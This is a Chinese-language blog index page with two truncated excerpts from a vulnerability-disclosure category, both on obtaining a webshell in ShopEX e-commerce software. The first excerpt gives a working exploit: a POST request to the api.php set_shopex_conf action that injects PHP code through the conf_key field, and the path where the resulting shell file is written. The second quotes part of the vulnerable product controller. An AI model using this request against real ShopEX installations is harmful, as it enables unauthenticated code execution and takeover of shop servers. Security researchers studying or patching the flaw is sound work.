• ShopEX 4.8.5.81822 前台Getshell

    ShopEX 4.8.5.81822 前台Getshell
    利用方式: Post提交 Post Data conf_key=<!--?php phpinfo();?-->.yyyyy&amp;conf_val=test 至 http://127.0.0.1/shopex-single-4.8.5.81822/api.php?act=set_shopex_conf&amp;api_version=5.0 Shell地址: http://127.0.0.1/shopex-single-4.8.5.81822/home/cache/cachedata.stat.php 提交后: 漏洞成因(解密后的代码错乱,只看关键的,无关代码已经略去) http://127.0.0...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:11,821次 | 标签:
  • shopex Getshell

    shopex Getshell
    博主有话说:这个漏洞,需要站点开启伪静态,不然也是鸡肋的。 ctl.product.php class ctl_product extends shopPage{ var $_call = 'call'; var $type = 'goods'; var $seoTag = array ('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_pr ice','update_time','goods_bn'); function ctl_product(){ ...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:5,567次 | 标签: